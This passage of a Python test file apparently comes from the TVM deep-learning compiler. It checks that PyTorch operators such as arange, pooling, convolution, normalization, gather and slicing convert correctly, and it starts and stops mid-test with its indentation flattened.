verify_model(Min(), input_data=input_data[0])
verify_model(Max2(), input_data=input_data[0])
verify_model(Min2(), input_data=input_data[0])
verify_model(Max3(), input_data=input_data)
verify_model(Min3(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_reciprocal():
torch.set_grad_enabled(False)
input_shape = [2, 1, 10, 1, 10]
class Reciprocal1(Module):
def forward(self, *args):
return args[0].reciprocal()
input_data = torch.rand(input_shape).float()
verify_model(Reciprocal1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_repeat():
torch.set_grad_enabled(False)
input_shape = [1, 3]
class Repeat1(Module):
def forward(self, *args):
return args[0].repeat(1, 1)
class Repeat2(Module):
def forward(self, *args):
return args[0].repeat(4, 2)
class Repeat3(Module):
def forward(self, *args):
return args[0].repeat(4, 2, 1)
input_data = torch.rand(input_shape).float()
verify_model(Repeat1().float().eval(), input_data=input_data)
verify_model(Repeat2().float().eval(), input_data=input_data)
verify_model(Repeat3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_repeat_interleave():
torch.set_grad_enabled(False)
input_shape = [2, 2, 3]
class RepeatInterleave1(Module):
def forward(self, *args):
return args[0].repeat_interleave(2)
class RepeatInterleave2(Module):
def forward(self, *args):
return args[0].repeat_interleave(3, dim=0)
class RepeatInterleave3(Module):
def forward(self, *args):
return args[0].repeat_interleave(2, dim=1)
class RepeatInterleave4(Module):
def forward(self, *args):
return args[0].repeat_interleave(4, dim=2)
input_data = torch.rand(input_shape).float()
verify_model(RepeatInterleave1().float().eval(), input_data=input_data)
verify_model(RepeatInterleave2().float().eval(), input_data=input_data)
verify_model(RepeatInterleave3().float().eval(), input_data=input_data)
verify_model(RepeatInterleave4().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_unsqueeze():
torch.set_grad_enabled(False)
input_shape = [10, 10]
class Unsqueeze1(Module):
def forward(self, *args):
return args[0].unsqueeze(2)
input_data = torch.rand(input_shape).float()
verify_model(Unsqueeze1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_squeeze():
torch.set_grad_enabled(False)
input_shape = [2, 1, 10, 1, 10]
class Squeeze1(Module):
def forward(self, *args):
return args[0].squeeze()
class Squeeze2(Module):
def forward(self, *args):
return args[0].squeeze(1)
input_data = torch.rand(input_shape).float()
verify_model(Squeeze1().float().eval(), input_data=input_data)
verify_model(Squeeze2().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_arange():
torch.set_grad_enabled(False)
class Arange1(Module):
def forward(self, *args):
return torch.arange(5)
class Arange2(Module):
def forward(self, *args):
return torch.arange(2.5)
class Arange3(Module):
def forward(self, *args):
return torch.arange(1, 4)
class Arange4(Module):
def forward(self, *args):
return torch.arange(1, 2.5, 0.5)
class Arange5(Module):
def forward(self, *args):
return torch.arange(1, 2, 1, dtype=torch.int32)
class Arange6(Module):
def forward(self, *args):
return torch.arange(start=1, end=6, step=2)
class Arange7(Module):
def forward(self, *args):
return torch.arange(1, 4, dtype=torch.float32)
class Arange8(Module):
def forward(self, *args):
return torch.arange(1, 2, 1, dtype=torch.int16)
class Arange9(Module):
def forward(self, *args):
end = torch.add(torch.tensor(4), 1)
return torch.arange(end) + torch.ones((5,), dtype=torch.int64)
class Arange10(Module):
def forward(self, *args):
end = torch.add(torch.tensor(4.0), torch.tensor(1.0))
return torch.arange(end) + torch.ones((5,), dtype=torch.float)
class Arange11(Module):
def forward(self, *args):
start = torch.add(torch.tensor(1), 1)
end = torch.add(torch.tensor(4), 1)
step = torch.add(torch.tensor(2), 1)
out = torch.arange(start, end, step)
return out + torch.ones((3,), dtype=torch.int64)
class Arange12(Module):
def forward(self, *args):
start = torch.add(torch.tensor(1), 1)
end = torch.add(torch.tensor(4), 1)
step = torch.add(torch.tensor(2.5), torch.tensor(4.1))
out = torch.arange(start, end, step)
return out + torch.ones((3,), dtype=torch.float)
verify_model(Arange1().float().eval())
verify_model(Arange2().float().eval())
verify_model(Arange3().float().eval())
verify_model(Arange4().float().eval())
verify_model(Arange5().float().eval())
verify_model(Arange6().float().eval())
verify_model(Arange7().float().eval())
verify_model(Arange8().float().eval())
verify_model(Arange9().float().eval())
verify_model(Arange10().float().eval())
verify_model(Arange11().float().eval())
verify_model(Arange12().float().eval())
@tvm.testing.uses_gpu
def test_forward_mesh_grid():
torch.set_grad_enabled(False)
class MeshGrid1(Module):
def forward(self, *args):
x = torch.tensor([1, 2, 3])
y = torch.tensor([4, 5, 6])
grid_x, grid_y = torch.meshgrid([x, y])
return grid_x, grid_y
class MeshGrid2(Module):
def forward(self, *args):
x = torch.tensor([1, 2, 3], dtype=torch.float32)
y = torch.add(torch.tensor(5, dtype=torch.float32), 1)
grid_x, grid_y = torch.meshgrid([x, y])
return grid_x, grid_y
verify_model(MeshGrid1().float().eval())
verify_model(MeshGrid2().float().eval())
@tvm.testing.uses_gpu
def test_forward_abs():
torch.set_grad_enabled(False)
input_shape = [2, 1, 10, 1, 10]
class Abs1(Module):
def forward(self, *args):
return args[0].abs()
input_data = torch.rand(input_shape).float()
verify_model(Abs1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_concatenate():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class Concatenate1(Module):
def forward(self, *args):
return torch.cat([args[0][:, 0].unsqueeze(1), args[0][:, 1].unsqueeze(1)], 1)
class Concatenate2(Module):
def forward(self, *args):
a = (args[0][:, :, 0] + 2) * 7
b = (args[0][:, :, 1] + 3) * 11
c = (args[0][:, :, 2] + 5) * 13
return torch.cat([t.unsqueeze(2) for t in [a, b, c]], 2)
input_data = torch.rand(input_shape).float()
verify_model(Concatenate1().float().eval(), input_data=input_data)
verify_model(Concatenate2().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_relu():
torch.set_grad_enabled(False)
input_shape = [10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.ReLU().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_prelu():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.PReLU(num_parameters=3).eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_leakyrelu():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.LeakyReLU().eval(), input_data=input_data)
verify_model(torch.nn.LeakyReLU(negative_slope=0.05).eval(), input_data=input_data)
verify_model(torch.nn.LeakyReLU(negative_slope=1.0, inplace=True).eval(), input_data=input_data)
verify_model(
torch.nn.LeakyReLU(negative_slope=1.25, inplace=True).eval(), input_data=input_data
)
@tvm.testing.uses_gpu
def test_forward_elu():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.ELU().eval(), input_data=input_data)
verify_model(torch.nn.ELU(alpha=0.3).eval(), input_data=input_data)
verify_model(torch.nn.ELU(alpha=1.0).eval(), input_data=input_data)
verify_model(torch.nn.ELU(alpha=1.3).eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_celu():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.CELU().eval(), input_data=input_data)
verify_model(torch.nn.CELU(alpha=0.3).eval(), input_data=input_data)
verify_model(torch.nn.CELU(alpha=1.0).eval(), input_data=input_data)
verify_model(torch.nn.CELU(alpha=1.3).eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_gelu():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.GELU().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_selu():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.SELU().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_softplus():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.Softplus().eval(), input_data=input_data)
verify_model(torch.nn.Softplus(beta=1.5, threshold=20).eval(), input_data=input_data)
verify_model(torch.nn.Softplus(beta=5, threshold=10).eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_softsign():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.Softsign().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_log_sigmoid():
torch.set_grad_enabled(False)
input_shape = [10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.LogSigmoid().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_adaptiveavgpool():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.AdaptiveAvgPool2d([1, 1]).eval(), input_data=input_data)
verify_model(torch.nn.AdaptiveAvgPool2d([10, 10]).eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_maxpool2d():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.MaxPool2d(kernel_size=[1, 1]).eval(), input_data)
verify_model(torch.nn.MaxPool2d(kernel_size=[10, 10]).eval(), input_data)
verify_model(torch.nn.MaxPool2d(kernel_size=[4, 4], padding=2, stride=2).eval(), input_data)
# A functional variant (default strides = None case)
class MaxPool2D(Module):
def forward(self, *args):
return torch.nn.functional.max_pool2d(args[0], kernel_size=[10, 10])
verify_model(MaxPool2D(), input_data=input_data)
class MaxPool2DWithIndices(Module):
def __init__(self):
super(MaxPool2DWithIndices, self).__init__()
self.pool = torch.nn.MaxPool2d(kernel_size=[1, 1], return_indices=True)
def forward(self, *args):
output, indices = self.pool(args[0])
return output
verify_model(MaxPool2DWithIndices().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_maxpool1d():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.MaxPool1d(kernel_size=1).eval(), input_data)
verify_model(torch.nn.MaxPool1d(kernel_size=10).eval(), input_data)
verify_model(torch.nn.MaxPool1d(kernel_size=4, padding=2, stride=2).eval(), input_data)
# A functional variant (default strides = None case)
class MaxPool1D(Module):
def forward(self, *args):
return torch.nn.functional.max_pool1d(args[0], kernel_size=10)
verify_model(MaxPool1D(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_maxpool3d():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.MaxPool3d(kernel_size=[1, 1, 1]).eval(), input_data)
verify_model(torch.nn.MaxPool3d(kernel_size=[10, 10, 10]).eval(), input_data)
verify_model(torch.nn.MaxPool3d(kernel_size=[4, 4, 4], padding=2, stride=2).eval(), input_data)
# A functional variant (default strides = None case)
class MaxPool3D(Module):
def forward(self, *args):
return torch.nn.functional.max_pool3d(args[0], kernel_size=[10, 10, 10])
verify_model(MaxPool3D(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_split():
torch.set_grad_enabled(False)
input_shape = [4, 10]
class Split(Module):
def __init__(self, split_size_or_sections, dim):
super(Split, self).__init__()
self.split_size_or_sections = split_size_or_sections
self.dim = dim
def forward(self, *args):
return torch.split(args[0], self.split_size_or_sections, self.dim)
input_data = torch.rand(input_shape).float()
verify_model(Split(2, 0).float().eval(), input_data=input_data)
verify_model(Split(3, 1).float().eval(), input_data=input_data)
verify_model(Split(4, 1).float().eval(), input_data=input_data)
verify_model(Split([2, 3, 5], 1).float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_avgpool():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class AvgPool2D2(Module):
def forward(self, *args):
return torch.nn.functional.avg_pool2d(args[0], kernel_size=[10, 10])
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.AvgPool2d(kernel_size=[10, 10]).eval(), input_data=input_data)
verify_model(AvgPool2D2().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_avgpool3d():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10, 10]
class AvgPool3D1(Module):
def forward(self, *args):
return torch.nn.functional.avg_pool3d(args[0], kernel_size=[10, 10, 10])
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.AvgPool3d(kernel_size=[10, 10, 10]).eval(), input_data=input_data)
verify_model(AvgPool3D1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_hardtanh():
torch.set_grad_enabled(False)
input_shape = [10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.Hardtanh().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_conv():
torch.set_grad_enabled(False)
conv1d_input_shape = [1, 3, 10]
conv2d_input_shape = [1, 3, 10, 10]
class Conv2D1(Module):
def __init__(self):
super(Conv2D1, self).__init__()
self.conv = torch.nn.Conv2d(3, 6, 7, bias=True)
self.softmax = torch.nn.Softmax()
def forward(self, *args):
return self.softmax(self.conv(args[0]))
class Conv2D2(Module):
def __init__(self):
super(Conv2D2, self).__init__()
self.conv = torch.nn.Conv2d(3, 6, 7, bias=False)
self.softmax = torch.nn.Softmax()
def forward(self, *args):
return self.softmax(self.conv(args[0]))
class Conv2D3(Module):
def __init__(self):
super(Conv2D3, self).__init__()
self.conv = torch.nn.Conv2d(3, 6, 7, groups=3, bias=False)
self.softmax = torch.nn.Softmax()
def forward(self, *args):
return self.softmax(self.conv(args[0]))
class Conv1D1(Module):
def __init__(self):
super(Conv1D1, self).__init__()
self.conv = torch.nn.Conv1d(3, 6, 7)
self.softmax = torch.nn.Softmax()
def forward(self, *args):
return self.softmax(self.conv(args[0]))
class Conv1D2(Module):
def __init__(self):
super(Conv1D2, self).__init__()
self.conv = torch.nn.Conv1d(3, 6, 7, bias=False)
self.softmax = torch.nn.Softmax()
def forward(self, *args):
return self.softmax(self.conv(args[0]))
class Conv1D3(Module):
def __init__(self):
super(Conv1D3, self).__init__()
self.conv = torch.nn.Conv1d(3, 6, 7, groups=3, bias=False)
self.softmax = torch.nn.Softmax()
def forward(self, *args):
return self.softmax(self.conv(args[0]))
conv2d_input_data = torch.rand(conv2d_input_shape).float()
verify_model(Conv2D1().float().eval(), input_data=conv2d_input_data)
verify_model(Conv2D2().float().eval(), input_data=conv2d_input_data)
# depth wise conv with channel mult 2
verify_model(Conv2D3().float().eval(), input_data=conv2d_input_data)
# group conv
verify_model(
torch.nn.Conv2d(8, 8, kernel_size=(3, 3), stride=(1, 1), groups=2).eval(),
input_data=torch.randn((1, 8, 16, 16)),
)
conv1d_input_data = torch.rand(conv1d_input_shape).float()
verify_model(Conv1D1().float().eval(), input_data=conv1d_input_data)
verify_model(Conv1D2().float().eval(), input_data=conv1d_input_data)
verify_model(Conv1D3().float().eval(), input_data=conv1d_input_data)
@tvm.testing.uses_gpu
def test_forward_conv_transpose():
torch.set_grad_enabled(False)
conv2d_input_shape = [1, 3, 10, 10]
conv2d_input_data = torch.rand(conv2d_input_shape).float()
verify_model(torch.nn.ConvTranspose2d(3, 6, 7, bias=True), input_data=conv2d_input_data)
verify_model(torch.nn.ConvTranspose2d(3, 12, 3, bias=False), input_data=conv2d_input_data)
conv1d_input_shape = [1, 3, 10]
conv1d_input_data = torch.rand(conv1d_input_shape).float()
verify_model(torch.nn.ConvTranspose1d(3, 6, 7, bias=True), input_data=conv1d_input_data)
verify_model(torch.nn.ConvTranspose1d(3, 12, 3, bias=False), input_data=conv1d_input_data)
@tvm.testing.uses_gpu
def test_forward_threshold():
torch.set_grad_enabled(False)
input_shape = [1, 3]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.Threshold(0, 0).float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_contiguous():
torch.set_grad_enabled(False)
input_shape = [10]
class Contiguous1(Module):
def forward(self, *args):
return args[0].contiguous()
input_data = torch.rand(input_shape).float()
verify_model(Contiguous1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_batchnorm():
def init_weight(m):
torch.nn.init.normal_(m.weight, 0, 0.01)
torch.nn.init.normal_(m.bias)
inp_2d = torch.rand((1, 16, 10, 10))
inp_3d = torch.rand((1, 16, 10, 10, 10))
for bn, inp in [(torch.nn.BatchNorm2d(16), inp_2d), (torch.nn.BatchNorm3d(16), inp_3d)]:
init_weight(bn.eval())
verify_model(bn.eval(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_instancenorm():
inp_2d = torch.rand((1, 16, 10, 10))
inp_3d = torch.rand((1, 16, 10, 10, 10))
for ins_norm, inp in [
(torch.nn.InstanceNorm2d(16), inp_2d),
(torch.nn.InstanceNorm3d(16), inp_3d),
]:
verify_model(ins_norm.eval(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_layernorm():
def init_weight(m):
torch.nn.init.normal_(m.weight, 0, 0.01)
torch.nn.init.normal_(m.bias, 0.02)
inp_2d = torch.rand((1, 16, 10, 10))
inp_3d = torch.rand((1, 16, 10, 10, 10))
for ln, inp in [(torch.nn.LayerNorm(10), inp_2d), (torch.nn.LayerNorm(10), inp_3d)]:
init_weight(ln.eval())
verify_model(ln.eval(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_groupnorm():
input_shape = [10, 6, 5, 5]
input_data = torch.rand(input_shape).float()
# Separate 6 channels into 3 groups
verify_model(torch.nn.GroupNorm(3, 6).eval(), input_data=input_data)
# Put all 6 channels into a single group (equivalent with LayerNorm)
verify_model(torch.nn.GroupNorm(1, 6).eval(), input_data=input_data)
# Separate 6 channels into 6 groups (equivalent with InstanceNorm)
verify_model(torch.nn.GroupNorm(6, 6).eval(), input_data=input_data)
input_shape = [1, 10, 4, 7]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.GroupNorm(1, 10).eval(), input_data=input_data)
verify_model(torch.nn.GroupNorm(2, 10).eval(), input_data=input_data)
verify_model(torch.nn.GroupNorm(5, 10).eval(), input_data=input_data)
verify_model(torch.nn.GroupNorm(10, 10).eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_reshape():
torch.set_grad_enabled(False)
input_shape = [2, 1, 10, 1, 10]
new_shape = [2, 1, 10, 10]
class Reshape1(Module):
def forward(self, *args):
return args[0].reshape(new_shape)
class Reshape2(Module):
def forward(self, *args):
return args[0].reshape([-1])
class Reshape3(torch.nn.Module):
def forward(self, x):
x_shape = x.shape
return x.reshape((x_shape[0] * x_shape[1], x_shape[2]))
input_data = torch.rand(input_shape).float()
verify_model(Reshape1(), input_data=input_data)
verify_model(Reshape2(), input_data=input_data)
verify_model(Reshape3(), input_data=torch.randn(2, 3, 4))
@tvm.testing.uses_gpu
def test_flatten():
class Flatten(Module):
def forward(self, x):
return torch.flatten(x)
class BatchFlatten(Module):
def forward(self, x):
return torch.flatten(x, start_dim=1)
inp = torch.rand((5, 2, 2))
verify_model(Flatten(), input_data=inp)
verify_model(BatchFlatten(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_transpose():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class Transpose1(Module):
def forward(self, *args):
return args[0].transpose(2, 3)
class Transpose2(Module):
def forward(self, *args):
return args[0].transpose(-2, -1)
class Transpose3(Module):
def forward(self, *args):
return args[0].permute(0, 2, 3, 1)
input_data = torch.rand(input_shape).float()
verify_model(Transpose1().float().eval(), input_data=input_data)
verify_model(Transpose2().float().eval(), input_data=input_data)
verify_model(Transpose3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_size():
torch.set_grad_enabled(False)
input_shape = [1, 3]
class Size1(Module):
def forward(self, *args):
return float(args[0].size(0)) * args[0]
input_data = torch.rand(input_shape).float()
verify_model(Size1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_type_as():
torch.set_grad_enabled(False)
input_shape = [1, 3]
def _create_module(dtype):
class TypeAs(Module):
def forward(self, *args):
expected_type_tensor = torch.zeros(1, 3, dtype=dtype)
return args[0].type_as(expected_type_tensor)
return TypeAs()
input_data = torch.randn(input_shape).float()
verify_model(_create_module(torch.float64), input_data=input_data)
verify_model(_create_module(torch.float32), input_data=input_data)
verify_model(_create_module(torch.int64), input_data=input_data)
verify_model(_create_module(torch.int32), input_data=input_data)
verify_model(_create_module(torch.int16), input_data=input_data)
verify_model(_create_module(torch.int8), input_data=input_data)
if torch.cuda.is_available():
check_fp16 = False
try:
# Only check half precision on supported hardwares.
if have_fp16(tvm.gpu(0).compute_version):
check_fp16 = True
except Exception as e:
# If GPU is not enabled in TVM, skip the fp16 test.
pass
# Temporary disable fp16 test
check_fp16 = False
if check_fp16:
verify_model(_create_module(torch.float16), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_view():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class View1(Module):
def forward(self, *args):
return args[0].view((1, 3 * 10 * 10))
class View2(Module):
def forward(self, *args):
return args[0].view(args[0].shape[0], -1)
class View3(Module):
def forward(self, *args):
d1 = torch.tensor(3) * torch.tensor(10) * torch.tensor(10)
return args[0].view(args[0].shape[0], d1)
input_data = torch.rand(input_shape).float()
verify_model(View1().float().eval(), input_data=input_data)
verify_model(View2().float().eval(), input_data=input_data)
verify_model(View3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_select():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class Select1(Module):
def forward(self, *args):
return args[0].select(1, 1)
class IndexedSelect(Module):
def __init__(self, inp, dim):
super().__init__()
self.inp = inp
self.dim = dim
if torch.cuda.is_available():
self.inp = self.inp.cuda()
def forward(self, index):
return torch.index_select(self.inp, self.dim, index)
input_data = torch.rand(input_shape).float()
verify_model(Select1().float().eval(), input_data=input_data)
x = torch.randn(3, 4)
indices = torch.tensor([0, 2])
verify_model(IndexedSelect(x, 0).eval(), input_data=indices)
verify_model(IndexedSelect(x, 1).eval(), input_data=indices)
@tvm.testing.uses_gpu
def test_forward_clone():
torch.set_grad_enabled(False)
input_shape = [10]
class Clone1(Module):
def forward(self, *args):
return args[0].clone()
input_data = torch.rand(input_shape).float()
verify_model(Clone1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_gather():
torch.set_grad_enabled(False)
class Gather1(Module):
def forward(self, *args):
return torch.gather(args[0], 0, args[1])
class Gather2(Module):
def forward(self, *args):
return torch.gather(args[0], 1, args[1])
class Gather3(Module):
def forward(self, *args):
return torch.gather(args[0], 2, args[1])
input_data = torch.rand((4,)).float()
index = torch.tensor([1])
verify_model(Gather1().float().eval(), input_data=[input_data, index])
input_data = torch.rand((2, 2)).float()
index = torch.tensor([[1, 0], [0, 1]])
verify_model(Gather1().float().eval(), input_data=[input_data, index])
input_data = torch.tensor([[1, 2], [3, 4]])
index = torch.tensor([[0, 0], [1, 0]])
verify_model(Gather2().float().eval(), input_data=[input_data, index])
input_data = torch.rand((2, 2)).float()
index = torch.tensor([[1, 0], [0, 1]])
verify_model(Gather2().float().eval(), input_data=[input_data, index])
input_data = torch.rand((3, 3, 3)).float()
index = torch.tensor(
[
[[1, 0, 0], [1, 0, 1], [0, 1, 1]],
[[1, 1, 1], [1, 2, 1], [1, 0, 1]],
[[1, 2, 1], [1, 2, 1], [1, 2, 1]],
]
)
verify_model(Gather3().float().eval(), input_data=[input_data, index])
@tvm.testing.uses_gpu
def test_forward_logsoftmax():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class LogSoftmax1(Module):
def forward(self, *args):
return torch.nn.LogSoftmax(dim=1)(args[0][0, 0])
input_data = torch.rand(input_shape).float()
verify_model(LogSoftmax1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_norm():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class Norm1(Module):
def forward(self, *args):
return torch.norm(args[0], p=float("inf"), dim=None, keepdim=False)
class Norm2(Module):
def forward(self, *args):
return torch.norm(args[0], p=float("-inf"), dim=None, keepdim=False)
class Norm3(Module):
def forward(self, *args):
return torch.norm(args[0], p=float("-inf"), dim=None, keepdim=True)
class Norm4(Module):
def forward(self, *args):
return torch.norm(args[0], p=float("inf"), dim=(1, 2), keepdim=False)
class Norm5(Module):
def forward(self, *args):
return torch.norm(args[0], p=float("inf"), dim=(1), keepdim=True)
class Norm6(Module):
def forward(self, *args):
return torch.norm(args[0], p=float(0.5), dim=(1), keepdim=True)
class Norm7(Module):
def forward(self, *args):
return torch.norm(args[0], p=float(1), dim=None, keepdim=False)
class Norm8(Module):
def forward(self, *args):
return torch.norm(args[0], p=float(2.0), dim=(1), keepdim=True)
class Norm9(Module):
def forward(self, *args):
return torch.norm(args[0], p=float(-0.5), dim=(1, 2), keepdim=True)
class Norm10(Module):
def forward(self, *args):
return torch.norm(args[0], p=float(-2), dim=(1), keepdim=False)
input_data = torch.rand(input_shape).float()
verify_model(Norm1().float().eval(), input_data=input_data)
verify_model(Norm2().float().eval(), input_data=input_data)
verify_model(Norm3().float().eval(), input_data=input_data)
verify_model(Norm4().float().eval(), input_data=input_data)
verify_model(Norm5().float().eval(), input_data=input_data)
verify_model(Norm6().float().eval(), input_data=input_data)
verify_model(Norm7().float().eval(), input_data=input_data)
verify_model(Norm8().float().eval(), input_data=input_data)
verify_model(Norm9().float().eval(), input_data=input_data)
verify_model(Norm10().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_frobenius_norm():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class FroNorm1(Module):
def forward(self, *args):
return torch.norm(args[0])
class FroNorm2(Module):
def forward(self, *args):
return torch.norm(args[0], p="fro", dim=None, keepdim=True)
class FroNorm3(Module):
def forward(self, *args):
return torch.norm(args[0], p="fro", dim=(1), keepdim=True)
class FroNorm4(Module):
def forward(self, *args):
return torch.norm(args[0], dim=None, keepdim=False)
input_data = torch.rand(input_shape).float()
verify_model(FroNorm1().float().eval(), input_data=input_data)
verify_model(FroNorm2().float().eval(), input_data=input_data)
verify_model(FroNorm3().float().eval(), input_data=input_data)
verify_model(FroNorm4().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_sigmoid():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.Sigmoid().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_dense():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class Dense1(Module):
def __init__(self):
super(Dense1, self).__init__()
self.linear = torch.nn.Linear(10, 7, bias=True)
def forward(self, *args):
return self.linear(args[0][0, 0])
class Dense2(Module):
def __init__(self):
super(Dense2, self).__init__()
self.linear = torch.nn.Linear(10, 7, bias=False)
def forward(self, *args):
return self.linear(args[0][0, 0])
input_data = torch.rand(input_shape).float()
verify_model(Dense1().float().eval(), input_data=input_data)
verify_model(Dense2().float().eval(), input_data=input_data)
trace = torch.jit.trace(Dense1(), [input_data])
mod, params = relay.frontend.from_pytorch(
trace,
[("input", input_shape)],
)
assert not any([op.name == "multiply" for op in list_ops(mod["main"])])
@tvm.testing.uses_gpu
def test_forward_dropout():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(torch.nn.Dropout(p=0.5).eval(), input_data=input_data[0, 0])
verify_model(torch.nn.Dropout2d(p=0.5).eval(), input_data=input_data[0])
verify_model(torch.nn.Dropout3d(p=0.5).eval(), input_data=input_data)
verify_model(torch.nn.AlphaDropout(p=0.5).eval(), input_data=input_data[0, 0])
@tvm.testing.uses_gpu
def test_forward_slice():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class Slice1(Module):
def forward(self, *args):
return args[0][:, :, :, :3]
class Slice2(Module):
def forward(self, *args):
return args[0][0, :, :-3, :]
class Slice3(Module):
def forward(self, *args):
x0 = torch.tensor(2) - torch.tensor(1)
x1 = torch.tensor(3) + torch.tensor(1)
return args[0][:, x0:, 1:x1, :]
class SliceWithStride(torch.nn.Module):
def forward(self, x):
return x[..., 0::2] + x[..., 1::2]
class SliceWithStride2(torch.nn.Module):
def forward(self, x):
return x[0::2, 0::2] + x[1::2, 1::2]
input_data = torch.rand(input_shape).float()
verify_model(Slice1(), input_data=input_data)
verify_model(Slice2(), input_data=input_data)
verify_model(Slice3(), input_data=input_data)
verify_model(SliceWithStride(), input_data=torch.randn(1, 4))
verify_model(SliceWithStride2(), input_data=torch.randn(4, 4))
@tvm.testing.uses_gpu
def test_forward_mean():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class Mean1(Module):
def forward(self, *args):
return args[0].mean(2)
input_data = torch.rand(input_shape).float()
verify_model(Mean1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_expand():
torch.set_grad_enabled(False)
class Expand1(Module):
def forward(self, *args):
return args[0].expand((3, -1, -1, -1))
input_shape = [1, 3, 10, 10]
input_data = torch.rand(input_shape).float()
verify_model(Expand1().float().eval(), input_data=input_data)
class Expand2(Module):
def forward(self, *args):
return args[0].expand((3, 3, 3, 1))
input_shape = [3, 1]
input_data = torch.rand(input_shape).float()
verify_model(Expand2().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_pow():
torch.set_grad_enabled(False)
input_shape = [1, 3, 10, 10]
class Pow1(Module):
def forward(self, *args):
return args[0] ** 2
input_data = torch.rand(input_shape).float()
verify_model(Pow1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_chunk():
torch.set_grad_enabled(False)
input_shape = [1, 3, 14, 14]
